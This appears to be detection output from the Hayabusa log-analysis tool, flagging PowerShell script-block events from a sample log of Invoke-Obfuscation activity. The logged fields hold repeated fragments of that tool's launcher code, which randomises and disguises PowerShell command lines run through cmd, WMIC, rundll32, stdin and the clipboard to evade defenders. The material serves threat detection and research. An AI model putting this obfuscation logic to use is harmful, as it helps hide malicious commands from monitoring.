(0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Show warning if an uneven number of double-quotes exists for any $LaunchType. $NumberOfDoubleQuotes = $ScriptString.Length-$ScriptString.Replace('""','').Length If($NumberOfDoubleQuotes%2 -eq 1) { Write-Host """" Write-Warning ""This command contains an unbalanced number of double quotes ($NumberOfDoubleQuotes).`n Try applying STRING or ENCODING obfuscation options first to encode the double quotes.`n"" Start-Sleep 1 Return $ScriptString } # If no $LaunchType is specified then randomly choose from options 3-20. 
If($LaunchType -eq 0) { $LaunchType = Get-Random -Input @(3..12) } # Select launcher syntax. Switch($LaunchType) { 1 { ######## ## PS ## ######## # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",$Char)} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^') } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + '""' + $ScriptString + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax) $CmdLineOutput = $PathToPowerShell + $PSCmdSyntax } 2 { ######### ## CMD ## ######### # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",$Char)} If($ScriptString.Contains(""^$Char"")) {$ScriptString = $ScriptString.Replace(""^$Char"",""^^^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^') } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + '""' + $ScriptString + '""' $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + $PathToPowerShell + $PSCmdSyntax # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax) $CmdLineOutput = $PathToCmd + $CmdSyntax } 3 { ########## ## WMIC ## ########## # WMIC errors when variables contain more than 2 adjacent whitespaces in variable names. Thus we are escaping them here. 
For($i=1; $i -le 12; $i++) { $StringToReplace = '${' + ' '*$i + '}' If($ScriptString.Contains($StringToReplace)) { $ScriptString = $ScriptString.Replace($StringToReplace,$StringToReplace.Replace(' ','\ ')) } } # Undo escaping from beginning of function. $CharsToEscape is defined at beginning of this function. ForEach($Char in $CharsToEscape) { While($ScriptString.Contains('^' + $Char)) { $ScriptString = $ScriptString.Replace(('^' + $Char),$Char) } } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^') } # Perform inline substitutions to remove commas from command line for wmic.exe. If($ScriptString.Contains(',')) { # SetVariables will only be used if more than 5 double quotes or more than 5 commas need to be escaped. $SetVariables = '' # Since we are converting the PowerShell command into strings for concatenation we need to escape and double-escape $ for proper variable interpretation by PowerShell. If($ScriptString.Contains('$')) { $ScriptString = $ScriptString.Replace('$','`$') # Double escape any $ characters that were already escaped prior to above escaping step. If($ScriptString.Contains('``$')) { $ScriptString = $ScriptString.Replace('``$','```$') } } # Double escape any escaped "" characters. If($ScriptString.Contains('`""')) { $ScriptString = $ScriptString.Replace('`""','``""') } # Substitute double quotes as well if we're substituting commas as this requires treating the entire command as a string by encapsulating it with double quotes. If($ScriptString.Contains('""')) { # Remove all layers of escaping for double quotes as they are no longer necessary since we're casting these double quotes to ASCII values. While($ScriptString.Contains('\""')) { $ScriptString = $ScriptString.Replace('\""','""') } # Randomly select a syntax for the Char conversion of a double quote ASCII value and then ramdomize the case. 
$CharCastDoubleQuote = ([Char[]](Get-Random -Input @('[String][Char]34','([Char]34).ToString()')) | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' If($ScriptString.Length-$ScriptString.Replace('""','').Length -le 5) { # Replace double quote(s) with randomly selected ASCII value conversion representation -- inline concatenation. $SubstitutionSyntax = ('\""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + '+' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $CharCastDoubleQuote + ' '*(Get-Random -Minimum 0 -Maximum 3) + '+' + ' '*(Get-Random -Minimum 0 -Maximum 3) + '\""') $ScriptString = $ScriptString.Replace('""',$SubstitutionSyntax).Replace('\""\""+','').Replace('\""\"" +','').Replace('\""\"" +','').Replace('\""\"" +','') } Else { # Characters we will use to generate random variable names. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(1..2)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Keep generating random variables until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($RandomVarName.ToLower())) { $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') $RandomVarLength++ } # Randomly decide if the variable name will be concatenated inline or not. 
$RandomVarNameMaybeConcatenated = $RandomVarName",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.296 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.296 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"If((Get-Random -Input @(0..1)) -eq 0) { $RandomVarNameMaybeConcatenated = '(' + (Out-ConcatenatedString $RandomVarName ""'"") + ')' } # Generate random variable SET syntax. $RandomVarSetSyntax = @() $RandomVarSetSyntax += '$' + $RandomVarName + ' '*(Get-Random @(0..2)) + '=' + ' '*(Get-Random @(0..2)) + $CharCastDoubleQuote $RandomVarSetSyntax += (Get-Random -Input @('Set-Variable','SV','Set')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $CharCastDoubleQuote + ' '*(Get-Random @(0..2)) + ')' # Randomly choose from above variable syntaxes. $RandomVarSet = (Get-Random -Input $RandomVarSetSyntax) # Replace double quotes with randomly selected ASCII value conversion representation -- variable replacement to save space for high counts of double quotes to substitute. $SetVariables += $RandomVarSet + ' '*(Get-Random @(1..2)) + ';' $ScriptString = $ScriptString.Replace('""',""`${$RandomVarName}"") } } # Randomly select a syntax for the Char conversion of a comma ASCII value and then ramdomize the case. 
$CharCastComma= ([Char[]](Get-Random -Input @('[String][Char]44','([Char]44).ToString()')) | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' If($ScriptString.Length-$ScriptString.Replace(',','').Length -le 5) { # Replace commas with randomly selected ASCII value conversion representation -- inline concatenation. $SubstitutionSyntax = ('\""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + '+' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $CharCastComma + ' '*(Get-Random -Minimum 0 -Maximum 3) + '+' + ' '*(Get-Random -Minimum 0 -Maximum 3) + '\""') $ScriptString = $ScriptString.Replace(',',$SubstitutionSyntax).Replace('\""\""+','').Replace('\""\"" +','').Replace('\""\"" +','').Replace('\""\"" +','') } Else { # Characters we will use to generate random variable names. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(1..2)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Keep generating random variables until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($RandomVarName.ToLower())) { $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') $RandomVarLength++ } # Randomly decide if the variable name will be concatenated inline or not. 
$RandomVarNameMaybeConcatenated = $RandomVarName If((Get-Random -Input @(0..1)) -eq 0) { $RandomVarNameMaybeConcatenated = '(' + (Out-ConcatenatedString $RandomVarName ""'"") + ')' } # Generate random variable SET syntax. $RandomVarSetSyntax = @() $RandomVarSetSyntax += '$' + $RandomVarName + ' '*(Get-Random @(0..2)) + '=' + ' '*(Get-Random @(0..2)) + $CharCastComma $RandomVarSetSyntax += (Get-Random -Input @('Set-Variable','SV','Set')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $CharCastComma + ' '*(Get-Random @(0..2)) + ')' # Randomly choose from above variable syntaxes. $RandomVarSet = (Get-Random -Input $RandomVarSetSyntax) # Replace commas with randomly selected ASCII value conversion representation -- variable replacement to save space for high counts of commas to substitute. $SetVariables += $RandomVarSet + ' '*(Get-Random @(1..2)) + ';' $ScriptString = $ScriptString.Replace(',',""`${$RandomVarName}"") } # Encapsulate entire command with escaped double quotes since entire command is now an inline concatenated string to support the above character substitution(s). $ScriptString = '\""' + $ScriptString + '\""' # Randomly decide on invoke operation since we've applied an additional layer of string manipulation in above steps. # Keep running Out-EncapsulatedInvokeExpression until we get a syntax that does NOT contain commas. # Examples like .((gv '*mdR*').Name[3,11,2]-Join'') can have their commas escaped like in above step. However, wmic.exe errors with opening [ without a closing ] in the string literal. $ScriptStringTemp = ',' While($ScriptStringTemp.Contains(',')) { $ScriptStringTemp = Out-EncapsulatedInvokeExpression $ScriptString } # Now that we have an invocation syntax that does not contain commas we will set $ScriptStringTemp's results back into $ScriptString. 
$ScriptString = $ScriptStringTemp # Prepend with $SetVariables (which will be blank if no variables were set in above sustitution logic depending on the number of double quotes and commas that need to be replaced. $ScriptString = $SetVariables + $ScriptString } # Generate random case syntax for PROCESS CALL CREATE arguments for WMIC.exe. $WmicArguments = ([Char[]]'process call create' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Randomize the whitespace between each element of $WmicArguments which randomly deciding between encapsulating each argument with single quotes, double quotes or no quote. $WmicArguments = (($WmicArguments.Split(' ') | ForEach-Object {$RandomQuotes = (Get-Random -Input @('""',""'"",' ')); $RandomQuotes + $_ + $RandomQuotes + ' '*(Get-Random -Minimum 1 -Maximum 4)}) -Join '').Trim() # Pair escaped double quotes with a prepended additional double quote so that wmic.exe does not treat the string as a separate argument for wmic.exe but the double quote still exists for powershell.exe's functionality. If($ScriptString.Contains('\""')) { $ScriptString = $ScriptString.Replace('\""','""\""') } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $ScriptString $WmicCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $WmicArguments + ' '*(Get-Random -Minimum 1 -Maximum 4) + '""' + $PathToPowerShell + $PSCmdSyntax + '""' # Set argument info for process tree output after this Switch block. # Even though wmic.exe will show in command line arguments, it will not be the parent process of powershell.exe. Instead, the already-existing instance of WmiPrvSE.exe will spawn powershell.exe. 
$ArgsDefenderWillSee += , @(""[Unrelated to WMIC.EXE execution] C:\WINDOWS\system32\wbem\wmiprvse.exe"", "" -secured -Embedding"") $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax) $CmdLineOutput = $PathToWmic + $WmicCmdSyntax } 4 { ############ ## RUNDLL ## ############ # Shout out and big thanks to Matt Graeber (@mattifestation) for pointing out this method of executing any binary directly from rundll32.exe. # Undo escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^') } # Generate random case syntax for SHELL32.DLL argument for RunDll32.exe. $Shell32Dll = ([Char[]]'SHELL32.DLL' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Put the execution flags in the format required by rundll32.exe: each argument separately encapusulated in double quotes. $ExecutionFlagsRunDllSyntax = ($PowerShellFlagsArray | Where-Object {$_.Trim().Length -gt 0} | ForEach-Object {'""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $_ + ' '*(Get-Random -Minimum 0 -Maximum 3) + '""' + ' '*(Get-Random -Minimum 1 -Maximum 4)}) -Join '' # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $ExecutionFlagsRunDllSyntax + ' '*(Get-Random -Minimum 1 -Maximum 4) + ""`""$ScriptString`"""" $RunDllCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $Shell32Dll + (Get-Random -Input @(',',' ', ((Get-Random -Input @(',',',',',',' ',' ',' ') -Count (Get-Random -Input @(4..6)))-Join''))) + 'ShellExec_RunDLL' + ' '*(Get-Random -Minimum 1 -Maximum 4) + ""`""$PathToPowerShell`"""" + $PSCmdSyntax # Set argument info for process tree output after this Switch block. 
$ArgsDefenderWillSee += , @($PathToRunDll , $RunDllCmdSyntax) $ArgsDefenderWillSee += , @(""`""$PathToPowerShell`"""", $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToRunDll + $RunDllCmdSyntax } 5 { ########## ## VAR+ ## ########## # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable name to store the $ScriptString command. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. $InvokeVariableSyntax = Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName # Generate random case syntax for setting the above random variable name. $SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' # Randomize the case of the following variables. 
$SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Build out command line syntax in reverse so we can di",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.296 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"If((Get-Random -Input @(0..1)) -eq 0) { $RandomVarNameMaybeConcatenated = '(' + (Out-ConcatenatedString $RandomVarName ""'"") + ')' } # Generate random variable SET syntax. $RandomVarSetSyntax = @() $RandomVarSetSyntax += '$' + $RandomVarName + ' '*(Get-Random @(0..2)) + '=' + ' '*(Get-Random @(0..2)) + $CharCastDoubleQuote $RandomVarSetSyntax += (Get-Random -Input @('Set-Variable','SV','Set')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $CharCastDoubleQuote + ' '*(Get-Random @(0..2)) + ')' # Randomly choose from above variable syntaxes. $RandomVarSet = (Get-Random -Input $RandomVarSetSyntax) # Replace double quotes with randomly selected ASCII value conversion representation -- variable replacement to save space for high counts of double quotes to substitute. $SetVariables += $RandomVarSet + ' '*(Get-Random @(1..2)) + ';' $ScriptString = $ScriptString.Replace('""',""`${$RandomVarName}"") } } # Randomly select a syntax for the Char conversion of a comma ASCII value and then ramdomize the case. $CharCastComma= ([Char[]](Get-Random -Input @('[String][Char]44','([Char]44).ToString()')) | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' If($ScriptString.Length-$ScriptString.Replace(',','').Length -le 5) { # Replace commas with randomly selected ASCII value conversion representation -- inline concatenation. 
$SubstitutionSyntax = ('\""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + '+' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $CharCastComma + ' '*(Get-Random -Minimum 0 -Maximum 3) + '+' + ' '*(Get-Random -Minimum 0 -Maximum 3) + '\""') $ScriptString = $ScriptString.Replace(',',$SubstitutionSyntax).Replace('\""\""+','').Replace('\""\"" +','').Replace('\""\"" +','').Replace('\""\"" +','') } Else { # Characters we will use to generate random variable names. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(1..2)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Keep generating random variables until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($RandomVarName.ToLower())) { $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') $RandomVarLength++ } # Randomly decide if the variable name will be concatenated inline or not. $RandomVarNameMaybeConcatenated = $RandomVarName If((Get-Random -Input @(0..1)) -eq 0) { $RandomVarNameMaybeConcatenated = '(' + (Out-ConcatenatedString $RandomVarName ""'"") + ')' } # Generate random variable SET syntax. 
$RandomVarSetSyntax = @() $RandomVarSetSyntax += '$' + $RandomVarName + ' '*(Get-Random @(0..2)) + '=' + ' '*(Get-Random @(0..2)) + $CharCastComma $RandomVarSetSyntax += (Get-Random -Input @('Set-Variable','SV','Set')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $CharCastComma + ' '*(Get-Random @(0..2)) + ')' # Randomly choose from above variable syntaxes. $RandomVarSet = (Get-Random -Input $RandomVarSetSyntax) # Replace commas with randomly selected ASCII value conversion representation -- variable replacement to save space for high counts of commas to substitute. $SetVariables += $RandomVarSet + ' '*(Get-Random @(1..2)) + ';' $ScriptString = $ScriptString.Replace(',',""`${$RandomVarName}"") } # Encapsulate entire command with escaped double quotes since entire command is now an inline concatenated string to support the above character substitution(s). $ScriptString = '\""' + $ScriptString + '\""' # Randomly decide on invoke operation since we've applied an additional layer of string manipulation in above steps. # Keep running Out-EncapsulatedInvokeExpression until we get a syntax that does NOT contain commas. # Examples like .((gv '*mdR*').Name[3,11,2]-Join'') can have their commas escaped like in above step. However, wmic.exe errors with opening [ without a closing ] in the string literal. $ScriptStringTemp = ',' While($ScriptStringTemp.Contains(',')) { $ScriptStringTemp = Out-EncapsulatedInvokeExpression $ScriptString } # Now that we have an invocation syntax that does not contain commas we will set $ScriptStringTemp's results back into $ScriptString. $ScriptString = $ScriptStringTemp # Prepend with $SetVariables (which will be blank if no variables were set in above sustitution logic depending on the number of double quotes and commas that need to be replaced. 
$ScriptString = $SetVariables + $ScriptString } # Generate random case syntax for PROCESS CALL CREATE arguments for WMIC.exe. $WmicArguments = ([Char[]]'process call create' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Randomize the whitespace between each element of $WmicArguments which randomly deciding between encapsulating each argument with single quotes, double quotes or no quote. $WmicArguments = (($WmicArguments.Split(' ') | ForEach-Object {$RandomQuotes = (Get-Random -Input @('""',""'"",' ')); $RandomQuotes + $_ + $RandomQuotes + ' '*(Get-Random -Minimum 1 -Maximum 4)}) -Join '').Trim() # Pair escaped double quotes with a prepended additional double quote so that wmic.exe does not treat the string as a separate argument for wmic.exe but the double quote still exists for powershell.exe's functionality. If($ScriptString.Contains('\""')) { $ScriptString = $ScriptString.Replace('\""','""\""') } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $ScriptString $WmicCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $WmicArguments + ' '*(Get-Random -Minimum 1 -Maximum 4) + '""' + $PathToPowerShell + $PSCmdSyntax + '""' # Set argument info for process tree output after this Switch block. # Even though wmic.exe will show in command line arguments, it will not be the parent process of powershell.exe. Instead, the already-existing instance of WmiPrvSE.exe will spawn powershell.exe. 
$ArgsDefenderWillSee += , @(""[Unrelated to WMIC.EXE execution] C:\WINDOWS\system32\wbem\wmiprvse.exe"", "" -secured -Embedding"") $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax) $CmdLineOutput = $PathToWmic + $WmicCmdSyntax } 4 { ############ ## RUNDLL ## ############ # Shout out and big thanks to Matt Graeber (@mattifestation) for pointing out this method of executing any binary directly from rundll32.exe. # Undo escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^') } # Generate random case syntax for SHELL32.DLL argument for RunDll32.exe. $Shell32Dll = ([Char[]]'SHELL32.DLL' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Put the execution flags in the format required by rundll32.exe: each argument separately encapusulated in double quotes. $ExecutionFlagsRunDllSyntax = ($PowerShellFlagsArray | Where-Object {$_.Trim().Length -gt 0} | ForEach-Object {'""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $_ + ' '*(Get-Random -Minimum 0 -Maximum 3) + '""' + ' '*(Get-Random -Minimum 1 -Maximum 4)}) -Join '' # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $ExecutionFlagsRunDllSyntax + ' '*(Get-Random -Minimum 1 -Maximum 4) + ""`""$ScriptString`"""" $RunDllCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $Shell32Dll + (Get-Random -Input @(',',' ', ((Get-Random -Input @(',',',',',',' ',' ',' ') -Count (Get-Random -Input @(4..6)))-Join''))) + 'ShellExec_RunDLL' + ' '*(Get-Random -Minimum 1 -Maximum 4) + ""`""$PathToPowerShell`"""" + $PSCmdSyntax # Set argument info for process tree output after this Switch block. 
$ArgsDefenderWillSee += , @($PathToRunDll , $RunDllCmdSyntax) $ArgsDefenderWillSee += , @(""`""$PathToPowerShell`"""", $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToRunDll + $RunDllCmdSyntax } 5 { ########## ## VAR+ ## ########## # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable name to store the $ScriptString command. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. $InvokeVariableSyntax = Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName # Generate random case syntax for setting the above random variable name. $SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' # Randomize the case of the following variables. 
$SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Build out command line syntax in reverse so we can di",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.296 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.296 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"splay the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $InvokeVariableSyntax $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + $ScriptString + '&&' + ' '*(Get-Random -Minimum 0 -Maximum 4) + $PathToPowerShell + $PSCmdSyntax + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 6 { ############ ## STDIN+ ## ############ # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking powershell.exe's StdIn. $PowerShellStdin = Out-RandomPowerShellStdInInvokeSyntax # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. 
$PSCmdSyntax = $PowerShellFlags + $PowerShellStdin $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $Echo + (Get-Random -Input ('/','\',' '*(Get-Random -Minimum 1 -Maximum 3))) + $ScriptString + ' '*(Get-Random -Minimum 1 -Maximum 3) + '|' + ' '*(Get-Random -Minimum 1 -Maximum 3) + $PathToPowerShell + $PSCmdSyntax + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 7 { ########### ## CLIP+ ## ########### # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking powershell.exe's StdIn. $PowerShellClip = Out-RandomClipboardInvokeSyntax # If this launcher is run in PowerShell 2.0 then Single-Threaded Apartment must be specified with -st or -sta. # Otherwise you will get the following error: ""Current thread must be set to single thread apartment (STA) mode before OLE calls can be made."" # Since Invoke-Obfuscation output is designed to run on any PowerShell version then for this launcher we will add the -st/-sta flag to $PowerShellFlags. # If selected then the -Command flag needs to remain last (where it currently is). $CommandFlagValue = $NULL If($PSBoundParameters['Command'] -OR $Command) { $UpperLimit = $PowerShellFlagsArray.Count-1 $CommandFlagValue = $PowerShellFlagsArray[$PowerShellFlagsArray.Count-1] } Else { $UpperLimit = $PowerShellFlagsArray.Count } # Re-extract PowerShellFlags so we can add in -st/-sta and then reorder (maintaining command flag at the end if present). $PowerShellFlags = @() For($i=0; $i -lt $UpperLimit; $i++) { $PowerShellFlags += $PowerShellFlagsArray[$i] } # Add in -st/-sta to PowerShellFlags. 
